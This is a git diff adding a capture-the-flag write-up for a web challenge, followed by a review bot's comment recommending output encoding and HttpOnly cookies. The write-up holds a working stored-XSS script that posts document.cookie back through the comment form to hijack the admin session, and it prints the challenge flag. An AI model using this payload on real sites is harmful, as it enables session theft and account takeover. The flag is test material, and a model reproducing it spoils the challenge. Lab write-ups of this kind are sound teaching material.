Diffstat (limited to 'punkctf/web_01.md')
-rw-r--r-- | punkctf/web_01.md | 17 |
1 files changed, 17 insertions, 0 deletions
diff --git a/punkctf/web_01.md b/punkctf/web_01.md new file mode 100644 index 0000000..51747c8 --- /dev/null +++ b/punkctf/web_01.md @@ -0,0 +1,17 @@ + +The comment field is vulnerable to injection, so we just inject a script that makes a comment with the document.cookie variable. + +``` +<script> +let data = new URLSearchParams(); +data.append('name', 'Cookies'); +data.append('comment', document.cookie); +fetch('/new-comment', { + method: 'POST', + headers: { "Content-Type": "application/x-www-form-urlencoded" }, + body: data, +}); +</script> +``` + +Then we set our session ID to the admin's, and go to the admin page. `punk_{QRPMGW20G1XF20IH}` |
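Review bot: the first sentence of the new web_01.md says the comment field is "vulnerable to injection" but never names the bug class or the root cause, so the write-up is hard to learn from. From the payload this reads as stored XSS in the comment body, and the trick of posting `document.cookie` back through `/new-comment` only yields a usable session ID because the session cookie is readable from script (not marked HttpOnly). Suggest stating both points explicitly and adding one line on the fix: encode the comment on output and set HttpOnly on the session cookie. Smaller points: the file has no heading naming the challenge, the opening code fence has no language tag (html would fit), and the file starts with an empty line.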